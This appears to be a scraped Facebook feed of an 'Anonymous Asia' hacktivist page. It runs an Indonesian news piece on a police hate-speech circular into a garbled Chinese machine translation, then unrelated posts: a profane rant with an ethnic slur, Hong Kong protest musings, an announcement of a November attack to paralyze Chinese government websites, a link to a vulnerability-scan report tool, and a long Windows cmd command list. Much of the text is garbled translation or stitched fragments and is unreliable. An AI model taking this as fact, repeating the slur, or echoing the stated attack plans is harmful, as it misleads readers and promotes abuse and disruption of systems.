Pada huruf (g) selanjutnya disebutkan bahwa ujaran kebencian sebagaimana dimaksud di atas bertujuan untuk menghasut dan menyulut kebencian terhadap individu dan atau kelompok masyarakat dalam berbagai komunitas yang dibedakan dari aspek:
1. Suku,
2. Agama,
3. Aliran keagamaan,
4. Keyakinan atau kepercayaan,
5. Ras,
6. Antargolongan,
7. Warna kulit,
8. Etnis,
9. Gender,
10. Kaum difabel,
11. Orientasi seksual.
Pada huruf (h) selanjutnya disebutkan bahwa “ujaran kebencian sebagaimana dimaksud di atas dapat dilakukan melalui berbagai media, antara lain:
1. Dalam orasi kegiatan kampanye,
2. Spanduk atau banner,
3. Jejaring media sosial,
4. Penyampaian pendapat di muka umum (demonstrasi),
5. Ceramah keagamaan,
6. Media massa cetak atau elektronik,
7. Pamflet.
Pada huruf (i), disebutkan bahwa “dengan memperhatikan pengertian ujaran kebencian di atas, perbuatan ujaran kebencian apabila tidak ditangani dengan efektif, efisien, dan sesuai dengan ketentuan peraturan perundang-undangan, akan berpotensi memunculkan konflik sosial yang meluas, dan berpotensi menimbulkan tindak diskriminasi, kekerasan, dan atau penghilangan nyawa”.
Prosedur penanganan
Adapun, pada nomor 3 SE itu, diatur pula prosedur polisi dalam menangani perkara yang didasari pada hate speech agar tidak menimbulkan diskriminasi, kekerasan, penghilangan nyawa dan atau konflik sosial yang meluas.
Pertama, setiap personel Polri diharapkan mempunyai pemahaman dan pengetahuan mengenai bentuk-bentuk kebencian.
Kedua, personel Polri diharapkan lebih responsif atau peka terhadap gejala-gejala di masyarakat yang berpotensi menimbulkan tindak pidana.
Ketiga, setiap personel Polri melakukan kegiatan analisis atau kajian terhadap situasi dan kondisi di lingkungannya. Terutama yang berkaitan dengan perbuatan ujaran kebencian.
Keempat, setiap personel Polri melaporkan ke pimpinan masing-masing terhadap situasi dan kondisi di lingkungannya, terutama yang berkaitan dengan perbuatan ujaran kebencian.
Apabila ditemukan perbuatan yang berpotensi mengarah ke tindak pidana ujaran kebencian, maka setiap anggota Polri wajib melakukan tindakan, antara lain:
- Memonitor dan mendeteksi sedini mungkin timbulnya benih pertikaian di masyarakat,
- Melakukan pendekatan pada pihak yang diduga melakukan ujaran kebencian,
- Mempertemukan pihak yang diduga melakukan ujaran kebencian dengan korban ujaran kebencian,
- Mencari solusi perdamaian antara pihak-pihak yang bertikai dan memberikan pemahaman mengenai dampak yang akan timbul dari ujaran kebencian di masyarakat;
Jika tindakan preventif sudah dilakukan namun tidak menyelesaikan masalah, maka penyelesaiannya dapat dilakukan melalui upaya penegakan hukum sesuai dengan:
- KUHP,
- UU Nomor 11 Tahun 2008 tentang Informasi dan Transaksi Elektronik,
- UU Nomor 40 Tahun 2008 tentang Penghapusan Diskriminasi Ras dan Etnis,
- UU Nomor 7 Tahun 2012 tentang Penanganan Konflik Sosial, dan
- Peraturan Kepala Kepolisian Negara Republik Indonesia Nomor 8 Tahun 2013 tentang Teknis Penanganan Konflik Sosial.

Ikuti perkembangan berita ini dalam topik:

Penulis: Fabian Januarius Kuwado
Editor : Bayu Galih

=====




你需要了解的“仇恨言論”通知警察局長各種各樣的事情...

週五,二零一五年十月三十○日| 下午六時06分.
費邊聖雅納略Kuwado / KOMPAS.com,,國家警察司令Badrodin海地.
 雅加達,KOMPAS.com - 在研究足夠長的時間,警方的通知(SE)首席有關仇恨言論或仇恨言論的處理最終發布。
SE號碼SE / 06 / X / 2015年10月8日,2015年以前簽訂的總Badrodin海地和已發送到區域股股長(Kasatwil)印尼各地。
在SE收到一份Kompas.com發展和法律司(Divbinkum)警方在週四(29/10/2015),提到仇恨言論的問題正日益受到廣大國家和國際社會日益對人權的保護意識的注意力(HAM )。
形狀,縱橫傳媒
在第2號(F)SE中提到,“仇恨言論可以被設置在刑法(刑法)和刑法以外的其他刑法規定的代碼,這是形式的犯罪​​行為:
1.侮辱,
2.誹謗,
3.瀆聖,
4.行為是不好玩,
5.挑釁,
6.煽動,
7.將消息傳播出去謊言,所有上述措施有目的或可能對歧視,暴力,失踪的生活產生了影響,而且還是社會衝突“。
在信中(G)進一步指出,提到了仇恨的演講上述旨在煽動和煽動仇恨的個人或人在從等方面區分各個社區團體:
1.部落,
2.宗教,
3.流量宗教,
4.信心或信任,
5.比賽,
6.際,
7.皮膚的顏色,
8.民族,
9.性別,
10.殘疾人,
11.性取向。
在信中(H)進一步指出,“對上述仇恨言論可以通過各種媒體,等等來實現:
1.在演講競選活動,
2.標語或橫幅,
3.社交媒體網絡,
4.提交輿論(示範)的,
5.講座宗教,
6.印刷或電子媒體,
7.小冊子。
在信(我),指出:“針對了解的仇恨言論以上,仇恨言論的行為,如果不處理,有​​效,高效,並按照法律規定,有可能造成社會衝突很普遍,並有可能導致歧視行為,暴力,或刪除的生活“。
辦理程序
同時,3號SE,它還設置在處理那些為了不引起歧視,暴力,或切除的生活和廣泛的社會矛盾的基礎上仇恨言論的情況下警察的程序。
首先,任何警務人員預計將有一個了解和其他形式的仇恨知識。
其次,警方人員預計將更加敏感或敏感的人誰是潛在的犯罪行為症狀。
第三,任何警察人員進行的在環境中的情況和條件的分析或評估。 特別是針對仇恨言論的行為。
第四,每個警務人員報告給每個在環境中的情況和條件的主席,特別是關於仇恨言論的行為。
如果這有可能導致仇恨言論的犯罪行為中的行為,那麼警方的每一個成員應採取措施,其中包括:
- 監控和及早發現的種子糾紛的發生在社會上,
- 接近當事人涉嫌仇恨言論,
- 瞻涉嫌仇恨言論的行為與仇恨言論的受害者,
- 尋找交戰各方之間和平的解決方案,並提供深入了解,將產生於仇恨在社會中的講話的影響;
如果預防行動已經開展了,但並沒有解決問題,那麼解決方案可以通過執法按照努力做到:
- 刑法典,
- 2008年信息與電子交易第11號法令,
- 2008年消除種族和族裔歧視法案第40號,
- 2012年第7號對社會衝突管理法,和
- 印尼警方8號2013年對社會衝突的技術管理共和國的行政調控。

請按照主題的這一消息的進展:

筆者 :法比安聖雅納略Kuwado
編者 :巴渝Galih

 =====
 
 Anonymous Asia - 匿名亞洲 More from Indonesia in our Network:
https://www.facebook.com/anon.indonesia1
https://www.facebook.com/groups/anon.indonesia1/

https://www.facebook.com/WakeUpProjectIndonesia
https://www.facebook.com/groups/indonesia.aid/

政治組織
Anonymous Indonesia 的相片。

 
 Anonymous Asia - 匿名亞洲新增了 1 張相片。
 Anonymous Asia - 匿名亞洲分享了 1 則貼文
Jhan Paras
Fuck the System
Not Just Fucking the Computer System
Fuck Also The Government SYSTEM,

Fuck the Chinaman rubbish system! We said!
 
 Anonymous Asia - 匿名亞洲
This is the name called 本土 in Hong Kong now.....
====================================
Greed has poisoned men’s souls, has barricaded the world with hate, has goose-stepped us into misery and bloodshed. We have developed speed, but we have shut ourselves in. Machinery that gives abundance has left us in want. Our knowledge has made us cynical. Our cleverness, hard and unkind. We think too much and feel too little. More than machinery we need humanity. More than cleverness we n⋯⋯
更多


The Great Dictator (1940) - Charlie Chaplin - Final Speech - Music - Hans Zimmer - Time - Subtitles

Daniel M. Kobayashi

 ===

 Anonymous Asia - 匿名亞洲
10月23日 10:16  這就是所謂的本土香港現在的名字.....====================================貪婪毒化了人的靈魂,已經搭成了世界的仇恨,已經鵝加強我們陷入痛苦和流血。我們發展了速度,但是我們隔離了自己。機械,讓充裕,卻使我們想要的。我們的知識使我們變得悲觀。我們的聰明,勤奮和無情。我們想得太多,感受得太少。超過機械,我們需要人性。比聰明更重要ñ⋯⋯更多大獨裁者(1940) - 卓別林 - 最後的講話 - 音樂 - 漢斯齊默 - 時間 - 字幕請購買本部電影!這裡新的視頻HT ...youtube.com


 Anonymous Asia - 匿名亞洲
..

 Anonymous Asia - 匿名亞洲
最愛蟈的“紅客”的下場


Cyberwar takes an unexpected turn, when China arrested Hackers at U.S.…
thehackernews.com|由 Swati Khandelwal upload.





america-china-cyberwar
For the very first time in history, China has arrested hackers within its borders at the request of the United States government.
The helping hands of China made me remind of recent Hollywood movie, The Martian, in which China's CNSA helped the United States' NASA to rescue astronaut Mark Watney who was mistakenly presumed dead and left behind on the planet Mars.
Although China did not rescue anyone, rather it did arrest, but the point is – China helped the United States.

Just two weeks before Chinese President Xi Jinping visited the U.S., the Chinese government took unprecedented step by complying with a United States request and arresting a handful of hackers within its borders, anonymous U.S. officials told the Washington Post.
The arrested hackers were suspected of stealing commercial secrets from U.S. firms and then selling or passing on those secrets to Chinese state-run companies.
The hackers were part of a wanted list drawn up by the U.S. intelligence and law enforcement agencies.
An unknown source familiar with the matter said Obama administration officials told China, "We need to know that you are serious. So we gave them a list, and we said – 'Look, here's the guys. Round them up.'"

Is the Arrest an Empty Gesture?

At the moment, there is no publicly available information related to the arrests – about who exactly was arrested or what punishments they face – but…
The U.S. officials are now hoping for public trials to see whether the China will follow through prosecutions, or whether these arrests will be nothing more than an empty gesture intended to rectify tensions with the U.S.
The arrests are believed to be part of the recent cyber deal the US President Barack Obama struck with Chinese President Xi Jinping last month, in which both the nations agreed that neither side will participate in commercial espionage against one another.
Though the arrests indicate a promising step towards a better relationship between China and the United States, the real test will be how long the Chinese government can stick to the agreement.

 #opchina #ophk 
 


10 Myths about the Nazis

September 27th, 2015 | by hqanon.
10 Myths about the Nazis
 The Third Reich, supposed to last for a thousand years, survived for a mere twelve. But those twelve years saw unmatched horror, guided by a set of magical and enigmatic myths which were believed not only by Hitler, but by most of his senior staff and officers. Many of these myths were widespread at the time, and embraced the divine wisdom of other occult movements, such as the Order of New Templars and the Thule Society.


10 Myths about the Nazis
Alltime10s

10神話關於納粹

2015年9月27日| 通過hqanon.
10 Myths about the Nazis
 第三帝國,預料要持續一千年,存活只有十二歲。 但是,這些12年看到無與倫比的恐怖,由一組這被認為不僅是希特勒的神奇而神秘的神話指導,但他的大部分高級職員和官員。 許多這些神話很普遍的時候,並接受其他隱匿性動作,如訂購新的聖殿和神的智慧, 圖勒協會

 
 Anonymous Asia - 匿名亞洲
Hong Kong Tiananmen, # 928Over the past year, much less the streets of Hong Kong are present Cui roll the eyeballs to look bomb taste. Public violence, said the day we become that we and manage non-native.365 days can change how many years?Things are to change, I see the transformation of the world will become 928 by the 71/64 / Anti-Gang a lesson.We dominated the history of the calendar it? No, we are time to change your mind. Allow me to speak in words to complete the following period.Then older people always say, the next generation of on to you.Ha, that generation has not yet put in place its own has to be handed over in the Xia Yibei. That is the process of human progress? I am no longer a courageous and a man. I have become a more complete integration. While establishing a new rule while, at the same time we give birth to a beast. As newborn children, they need is education, not poetry catchy, hold bag chivalrous scholar.928 and there will be much singing and dancing. How many believers do not like preaching day and there will be. I have walked among the crowd did not want to pay attention.Instead, prepare some behind a year we have been to no small progress. Technology is our desire, so we are more water thirst for knowledge. Today, Hong Kong people have lost their place. To find a way out to their homes but not easy. Hong Kong people will have several difficult road even become a forgotten history. Fu also want more self-seeking.Anonymous Asia - Asia anonymous photo.
Anonymous Asia - 匿名亞洲的相片。
香港人的六四, #928
一年的過去,香港大大少的街道都存在崔睙彈的味道。當日說我們暴力的市民,變成說我們和理非的本土。
365天的歲月可以改變多少?
世事正在求變,我看到世界的轉變會由71/64變成928/反課岡了。
我們主導了史歷嗎?不是,我們正時要改變你的想法。容許我以中文字完成以下一段發言。
當年老一輩的人常說,下一代就交給你了。
哈,自己那一代還未到位已要交給在下一輩了。那是人類的進步過程嗎?我不再是一個有勇有某的人。我已成為一個更完整的融合。同時建立一種新規則之餘,我們又同時生出一頭野獸。正如新生的小孩,他們需要的是教育,而不是詩詞上口,抱書包的書生勇武。
928又會有多少唱歌跳舞。又會有多少未日信徒般的說教。我走到人群當中已不想在注意了。
反而一些背後的準備,一年已來我們又進步了不小。技術是我們渴求的,所以我們更水渴求知識。今天香港人已失去自己的地方。要到他鄉尋生路又不是易事。香港人的路會有幾困難什至成為一個被遺忘的歷史。還望自求多褔。







 Anonymous Asia - 匿名亞洲分享了 1 個活動
9月27日 · 
 9/28 Taiwanese support Hong Kong - # Taiwan Supports # HongKonghttps://www.facebook.com/events/730707650407872/28September10/2 Taiwanese support Hong KongMonday 6 pm · Liberty Square · Taipei1,210 guests===
28
9 月
週一 6 下午 · 自由廣場 · 台北市
1,210 位來賓

Anonymous China - 匿名中国
中 国公民你好,我们是匿名者,几年前,政府开始禁止Facebook,谷歌,YouTube和其他网站现在有几年的时间。但直到最近,中国政府在网络上阻止 越来越严重。也有政府网站源源不断已被禁止。与此同时,一些VPN,VPS提供商可以被强制关闭。中国公民,醒醒吧,不要被当前的政府混为一谈,用自己的 权利,争取民主,自由。我们将站在人民这一边。我们将在十一月瘫痪中国政府网站。代号是:‪#‎OP中国我们会履行承诺‬
我们都是匿名
我们是军团
我们不会忘记
我们不原谅
期待我们

Chinese citizens hello, we are anonymous, a few years ago, the government began to ban Facebook, Google, YouTube and other sites now have a few years time. But until recently, the Chinese government blocked on the network more and more serious. There is also a steady stream of government websites have been banned. Meanwhile, some VPN, VPS providers can be forced to close. Chinese citizens, wake up, do not be confused with the current government, with their rights, fight for democracy and freedom. We will stand with the people on this side. We will be paralyzed in November the Chinese government website. Code: ‪#‎OP‬ China will fulfill our commitments.
We are Anonymous
We are Legion
We do not Forget
We do not Forgive
Expect us
https://www.youtube.com/watch?v=LaBqTlY1U6w




 
Anonymous fans หSeptember 20 · Edit Records ·Hello everyone, we are Anonymous anonymous.We are mainly active in Europe and the Middle East,We recently umbrella revolution because Hong Kong, while in Asia the Chinese region famous,But there are a lot of people do not know us, then I will tell you one,What is Anonymous? Who are we? What are we doing? And how how to join us?Anonymous is not organized, nor belong to any one business and political parties,It's just a concept, an idea,We support Internet freedom, freedom of speech,Equality, non-racial, non-sexist, nor war,Not greedy businessman, nor corrupt government.This is part of the world's citizens, the state should fear the citizens,But many countries have abandoned citizens, citizens took to the streets to protest the government's injustice,And we are helping citizens get part of their rights,We will keep justice, we always stand side of the people."Anonymous" originated from abroad maps forum 4chan,4chan biggest feature is that all users are called "Anonymous"Later, they began to form a consensus,They also are in "anonymous" as referred to,But because there are some people spread rumors,There are some people intentionally start something and action plan,At that time, an anonymous person who had been considered to be a terrorist organization,We are not terrorists, nor is God, the saints,We just thought we should do the right thing,We do not use fraud, murder,Even inhuman behavior to achieve so-called "justice."This is a picture is a question mark wearing a suit headless man,As this chart it shows us that without a leader,So also no one can control us,We do not divide the class, we are all equal,Each of you yourself, are anonymous leader,We all must follow the concept of anonymous,And to execute it.We mainly through IRC and community sites to each other contact with each other,If you want to contact us, please take a moment to learn how to become a true anonymity,Whether you are in IRC chat with us, you must have the ability to hide the name,You are going to study how to use the Proxy and VPN, and even pay for better VPN service,These will help you hide footprints, to avoid the disclosure of personal information to organizations and governments,However, to note is free and cracking, it is not effective.Everyone can become anonymous,It's not just become anonymous so simple,You have to go to truly understand Anonymous,And with that you have the knowledge and skills to help the community,As long as your thoughts and ideas with the same anonymous, then you are our one.All anonymous, will not use real personal information,Never use real anonymous member profile,This means that you have to put down your name and identity,You must clearly know that, who are you?You're anonymous, you do not name, nor identity.If you are a hacker,You participate in any form of hacking or DDoS attacks,You have to know that this is a illegal act,You also need to understand that if you are unfortunate enough to be seizing the police,You will be faced with a question of law, the responsibility you have to bear,Because this is your choice.Here, I will need to emphasize one thing,Anonymous has been speculation that the hacker doctrine of the organization,But in fact not the case, an anonymous person but a concept,So you do not have hacking techniques,Because sharing is your weapon,Your job is to care about social issues,When subjected to unequal treatment of citizens,You have to help them, and share the message out.Finally, if you agree with our philosophy,And you, like us, have a common philosophy,Welcome, you are now joined us,Let us work together to achieve our common idea of ​​it.


 匿名者 粉絲團 ห
大家好,我們是Anonymous匿名者。
我們主要活躍在歐美與中東地區,
最近我們因為香港的雨傘革命,而在亞洲華人地區出名,
但是有很多人還不認識我們,接下來我會一一告訴你,
什麼是匿名者?我們是誰?我們在做什麼?又該如何怎麼加入我們?
匿名者不是組織,也不屬於任何一個企業和政黨,
它只是一個理念,一個想法,
我們支持網際網路自由、言論自由,
人人平等,沒有種族歧視,沒有性別歧視,也沒有戰爭,
沒有貪婪的商人,也沒有腐敗的政府。
這個是屬於公民的世界,國家應該害怕公民,
但是很多國家都背棄了公民,讓公民走上街頭抗議政府的不公不義,
而我們就是幫助公民取得屬於他們的權益,
我們會不停地伸張正義,我們永遠站在人民的一方。
「匿名者」起源來自於國外的貼圖論壇4chan,
4chan最大的特點是所有的用戶都叫做「匿名者」,
後來大家開始形成了共識,
大家也都以「匿名者」做為統稱,
但是因為有一些人散佈謠言,
有某些人有意開始計畫與行動某些事情,
在那個時候,匿名者就一直被認為是恐怖組織,
我們不是恐怖份子,也不是上帝、聖人,
我們只是認為我們應該做對的事情,
我們不會利用詐騙、殺人,
甚至不人道的行為來達到所謂的「正義」。
這一張圖是一個穿著西裝的無頭問號人,
正如這張圖它說明了我們沒有領導人,
所以也沒有任何人可以控制我們,
我們也沒有分階級,我們都是平等的,
你們每一個自己,都是匿名的領導者,
我們都必須要遵循匿名者的理念,
並且去執行它。
我們主要透過IRC和社群網站來彼此互相聯繫,
如果想要跟我們聯繫,請花點時間來學習,如何成為真正的匿名,
不管你是在IRC跟我們聊天,你都必須要有隱藏姓名的能力,
你要去研究如何使用Proxy和VPN,甚至花錢購買VPN的服務更好,
這些都會幫助你隱藏足跡,避免洩露了個人資料給組織和政府,
不過要注意是免費和破解的,都是沒有效的。
每一個人都可以成為匿名者,
這不只是成為匿名者這麼簡單,
你必須要去真正地瞭解匿名者,
並且用你所擁有的知識和技術去幫助社會,
只要你的想法和理念跟匿名者一樣,那麼你就是我們的一員。
所有的匿名者,都不會使用真實的個人資料,
從來沒有匿名成員會使用真實的個人資料,
這表示你必須放下你的姓名和身份,
你必須清楚知道這一點,你是誰?
你是匿名者,你沒有名字,也沒有身份。
如果你是一名黑客,
你參與任何形式的黑客攻擊或DDoS攻擊,
你要知道這是一個違法的行為,
你也必須要瞭解,如果你不幸的被警方查緝,
你將會面對法律的問題,你必須要承擔的責任,
因為這是你的選擇。
在這裡我必需要強調一件事情,
匿名者被外界認為是黑客主義的組織,
但事實上並不是這樣,匿名者只是一個理念,
所以你不需要擁有黑客技術,
因為分享就是你的武器,
你的工作就是關心社會的議題,
在公民遭受到不平等的對待時,
你必須去幫助他們,並且把訊息分享出去。
最後,如果你認同我們的理念,
並且你和我們一樣,有共同的理念,
歡迎你,你現在已經加入我們了,
讓我們一起共同去實現我們的理念吧。

 
 匿名者 粉絲團 ห
 Anonymous fans หAt 23:39 on October 30 *Due to the need (penetration testing, leak sweep), often you need to use a variety of vulnerability scanning tools for testing, and report to excel extract unified document. Sometimes, because of the workload it is very large and extremely tired. This tool is now open. Program interface is as follows: EXCEL results AWVS extracted as follows (extracts only high, dangerous vulnerabilities, and automatically translated by bing): Downloadhttp://wtfsec.org/3164.html

AWVS report extraction toolDue to the need (penetration testing, leak sweep), often you need to use a variety of vulnerability scanning tools for testing, and report to excel extract unified document. Sometimes ... Share this article: Click to share on Twitter (opens in new window) on Facebook ...wtfsec.org
由 于工作需要(渗透测试,漏扫),经常需要使用各种漏洞扫描工具进行测试,并将其报告统一提取至excel文档。有时候会因为工作量十分庞大而劳累万分。现 将此工具公开。 程序界面如下: AWVS提取后的EXCEL结果如下(只提取高,中危险漏洞,并通过bing自动翻译): 点击下载
http://wtfsec.org/3164.html


由于工作需要(渗透测试,漏扫),经常需要使用各种漏洞扫描工具进行测试,并将其报告统一提取至excel文档。有时…共享此文章:点击以在 Twitter 上共享(在新窗口中打开)在 Facebook…
wtfsec.org

 

 EverybodyWe finally have a website of AnonymousURL: https://sites.google.com/s…/nimingzheanonymousnimingzhe/home
 Thanks: Volcano United Kingdom - Technical Department assisted in the productionBY: anonymous crew

各位
我們匿名者終於有網站了
網址:https://sites.google.com/s…/nimingzheanonymousnimingzhe/home
感謝:火山聯合王國-技術部協助製作
BY:匿名者全體人員

 
 Anonymous fans หSeptember 25 *TO: anonymous fans want to design the program's fanscmd scriptSome fine with yet unknown to cmd codecalc ----------- start electronic calculatorconf ----------- start netmeetingStart Character Map charmap --------certmgr.msc ---- certificate management utilitycliconfg ------- SQL SERVER Client network utilitychkdsk.exe ----- Chkdsk magnetic dispatch inspectioncmd.exe -------- CMD command promptClipbrd -------- Clipboard Viewercompmgmt.msc --- Computer Managementciadv.msc ------ Indexing Service programcleanmgr ------- disk garbage sortingcompmgmt.msc --- Computer Managementdvdplay -------- DVD playerdiskmgmt.msc --- magnetic dispatch management utilitydfrg.msc ------- defrag toolDevice Manager devmgmt.msc ---Check DirectX dxdiag --------- Informationdrwtsn32 ------ System DoctorDevice Manager devmgmt.msc ---dcomcnfg ------- open system components and servicesddeshare ------- open DDE shared setexplorer ------- open Explorereventvwr.msc --------- Event Viewereudcedit ------- Characters and proceduresfsmgmt.msc ----- shared folder managergpedit.msc ----- Group Policyiexpress ------- Trojan element service tools, system originallogoff --------- Logout instructionlusrmgr.msc ---- local machine users and groupsmem.exe -------- display memory usageMsconfig.exe --- System Configuration Utilitymplayer2 ------- Easy widnows media playermspaint -------- drawing boardmstsc ---------- Remote Desktop connectionmplayer2 ------- media playerMagnifier utility magnify --------mmc ------------ open consolemobsync -------- synchronous instructionnotepad -------- Open Notepadnet start messenger ---- Start messenger servicenet stop messenger ----- stop courier serviceNslookup ------- IP address detectornotepad -------- Open Notepadnslookup ------- network management tools guidentbackup ------- system backup and restore productionnarrator ------- Screen "Narrator"ntmsmgr.msc ---- Removable Storage Managerntmsoprq.msc --- mobile storage administrator operation requestnetstat -an ---- (TC) command to check the connectionosk ------------ Open-screen keypadodbcad32 ------- ODBC Data Source Manageroobe / msoobe / a ---- check whether to activate XPpackager ------- wrapper on the imageperfmon.msc ---- Computer efficacy monitoring proceduresprogman -------- Program Managerregedit.exe ---- registryrsop.msc ------- group policy result setrononce -p ---- 15 seconds offregedt32 ------- Registry EditorResults principles set rsop.msc --------regedit.exe ---- registryrsop.msc ------- group policy result setregsvr32 / u * .dll ---- Stop dll file executionregsvr32 / u zipfldr.dll ------ cancel ZIP supportsyncapp -------- Add a briefcasesysedit -------- System Configuration Editorsigverif ------- File Signature Verification programsndrec32 ------- recordershrpubw -------- new shared foldersecpol.msc ----- Local Security Principlessyskey --------- system encryption, encryption can not be solved once the protection system of double windows xp passwordNative service settings services.msc ---Sndvol32 ------- Volume Control programsfc.exe -------- System File Checkersfc / scannow --- windows file protectionsndrec32 ------- recorderNative service settings services.msc ---sfc / scannow ----- scanning error and recoverytsshutdn ------- 60 second countdown shutdown commandtaskmgr ----- Work Manager (2000 / xp / 2003)About tourstart ------ xp (after the installation is complete roaming xp program)utilman -------- assisting tool managerwinchat -------- XP comes with LAN chatwinver --------- check the Windows versionwinmsd --------- System Informationwinver --------- check the Windows versionwmimgmt.msc ---- open windows management architecture (WMI)wupdmgr -------- windows updatewscript -------- windows script host setwrite ---------- WordPadwinmsd --------- System Informationwiaacmgr ------- Scanner and Camera Wizardwinchat -------- XP original LAN chat--------------- ----------------------- Network-related● look at their computer IP --- → c: ipconfig● View detailed network configuration parameters --- → c: ipconfig / all● release IP --- → c: ipconfig / release● update their IP addresses --- → c: ipconfig / renew● detect each other's connection status --- → c: ping URL, or other computer● see if someone connect to your computer --- → c: netstat -nap tcp● track each other's connection path --- → c: tracert each other's IP● send a message to the specified computer or IP --- → c: net send IP or computer name of the message contentUsing AT commandsat [\ computername] [[id] [/ delete] | / delete [/ yes]]at [\ computername] time [/ interactive] [/ every: date [, ...] | / next: date [, ...]] commandParametersNoIf using parameters, at lists scheduled commands will.\ ComputernameSpecify the remote computer. If you omit this parameter, the instruction will be scheduled to be executed on the local computer.idAssigned to the schedule specified command ID number./ DeleteCancellation of scheduled instruction. If you omit the id, it will cancel all the scheduled commands on the computer./ YesWhen you delete a scheduled event, forcing the system to answer yes to all queries.timeSpecifies the time the instruction to be executed. 24-hour time (00:00 [midnight] through 23:59) symbol notation hours: minutes./ InteractiveIf the user during work execution login, this allows the interaction between the work and the user desktop./ Every: date [, ...]Fixed on a weekly or monthly day of instruction execution (for example, every Thursday, or the third day of every month). You can specify a date for a day or on certain days of the week (Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday), or a day or a few days a month ( Use 1-31 numbers), and a plurality of segments with a comma date information on the project. If you omit the date, it is assumed to be the day of the month./ Next: date [, ...]The next time execute the specified instruction designated day (for example, next Thursday). You can specify a date for a day or on certain days of the week (Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday), or a day or a few days a month ( Use 1-31 numbers), and a plurality of segments with a comma date information on the project. If you omit the date, it is assumed to be the day of the month.InstructionWindows 2000 directive specifies to be executed, the program (.exe or .com file), or batch program (.bat or .cmd file). If the command requires a path as an argument, use the absolute path; that contains the full path to the drive letter. If the instruction bit on the remote computer, change the specified server and share name UNC notation method, rather than the distal end of the drive letter. If the instruction does not belong to an executable file (.exe), that you will have to add in front of the instruction set cmd / c; for example:cmd / c dir> c: test.outBY: anonymous fans

 匿名者 粉絲團 ห
TO: 匿名者粉絲團 想設計程式的粉絲
cmd 指令碼
一些蠻好用又不為人知到cmd 碼
calc-----------啟動電子計算器
conf-----------啟動 netmeeting
charmap--------啟動字元對應表
certmgr.msc----證書管理實用程序
cliconfg-------SQL SERVER 客戶端網路實用程序
chkdsk.exe-----Chkdsk磁牒檢查
cmd.exe--------CMD命令提示字元
Clipbrd--------剪貼板檢視器
compmgmt.msc---電腦管理
ciadv.msc------索引服務程序
cleanmgr-------磁碟垃圾整理
compmgmt.msc---電腦管理
dvdplay--------DVD播放器
diskmgmt.msc---磁牒管理實用程序
dfrg.msc-------磁碟重組工具
devmgmt.msc--- 裝置管理員
dxdiag---------檢查DirectX資訊
drwtsn32------ 系統醫生
devmgmt.msc--- 裝置管理員
dcomcnfg-------開啟系統元件服務
ddeshare-------開啟DDE共享設定
explorer-------開啟檔案總管
eventvwr.msc---------事件檢視器
eudcedit-------造字程序
fsmgmt.msc-----共用資料夾管理器
gpedit.msc-----群組原則
iexpress-------木馬元件服務工具,系統原有的
logoff---------登出指令
lusrmgr.msc----本地機用戶和組
mem.exe--------顯示記憶體使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠端桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------開啟控制台
mobsync--------同步指令
notepad--------開啟記事本
net start messenger----開始信使服務
net stop messenger-----停止信使服務
Nslookup-------IP位址偵測器
notepad--------開啟記事本
nslookup-------網路管理的工具嚮導
ntbackup-------系統制作備份和還原
narrator-------螢幕「講述人」
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)指令檢查連接
osk------------開啟螢幕小鍵盤
odbcad32-------ODBC資料來源管理器
oobe/msoobe /a----檢查XP是否啟動
packager-------對像包裝程序
perfmon.msc----電腦效能監測程序
progman--------程序管理器
regedit.exe----註冊表
rsop.msc-------群組原則結果集
rononce -p ----15秒關機
regedt32-------註冊表編輯器
rsop.msc--------原則的結果集
regedit.exe----註冊表
rsop.msc-------群組原則結果集
regsvr32 /u *.dll----停止dll文件執行
regsvr32 /u zipfldr.dll------取消ZIP支持
syncapp--------新增一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------新增共用資料夾
secpol.msc-----本機安全原則
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本機服務設定
Sndvol32-------音量控制程序
sfc.exe--------系統檔案檢查器
sfc /scannow---windows文件保護
sndrec32-------錄音機
services.msc---本機服務設定
sfc /scannow-----掃瞄錯誤並復原
tsshutdn-------60秒倒計時關機指令
taskmgr-----工作管理器(2000/xp/2003)
tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
utilman--------協助工具管理器
winchat--------XP自帶區域網路聊天
winver---------檢查Windows版本
winmsd---------系統資訊
winver---------檢查Windows版本
wmimgmt.msc----開啟windows管理體系結構(WMI)
wupdmgr--------windows更新程序
wscript--------windows指令碼宿主設定
write----------寫字板
winmsd---------系統資訊
wiaacmgr-------掃瞄儀和照相機嚮導
winchat--------XP原有的區域網路聊天
---------------網路相關-----------------------
●察看自己電腦的IP---→c:ipconfig
●察看詳細的網路設定參數---→c:ipconfig /all
●釋放IP---→c:ipconfig /release
●更新自己的IP位址---→c:ipconfig /renew
●偵測對方的連線狀態---→c:ping 網址或對方電腦
●察看是否有人連線到你的電腦---→c:netstat -nap tcp
●追蹤對方的連線路徑---→c:tracert 對方的IP
●傳送訊息給指定電腦或IP---→c:net send IP或電腦名稱 訊息內容
使用 AT指令
at [\computername] [[id] [/delete] | /delete [/yes]]
at [\computername] time [/interactive] [/every:date[,...]| /next:date[,...]] command
參數

若不使用參數,at 會列示排定的指令。
\computername
指定遠端電腦。如果省略此參數,則指令便會排定在本機電腦上執行。
id
指定指派給排定指令的識別碼編號。
/delete
取消排定的指令。如果省略 id,便會取消電腦上所有排定的指令。
/yes
在刪除排定的事件時,強制以 yes 回答系統的所有查詢。
time
指定指令要執行的時間。時間可以 24 小時制 (00:00 [午夜] 到 23:59) 符號表示法表示 hours:minutes。
/interactive
如果使用者是在工作執行期間登入,此可允許工作與該使用者桌面之間的互動。
/every:date[,...]
固定在每週或每月的某一天執行指令 (例如,每週四或每個月的第三天)。您可以將 date 指定為一週內的某一天或某幾天 (週一、週二、週三、週四、週五、週六、週日),或是一個月內的某一天或某幾天 (使用 1 到 31 的數字),並使用逗號區隔多個日期資料項目。如果省略 date,則會假設成當月的當天。
/next:date[,...]
在下一次的指定日執行指定的指令 (例如,下星期四)。您可以將 date 指定為一週內的某一天或某幾天 (週一、週二、週三、週四、週五、週六、週日),或是一個月內的某一天或某幾天 (使用 1 到 31 的數字),並使用逗號區隔多個日期資料項目。如果省略 date,則會假設成當月的當天。
指令
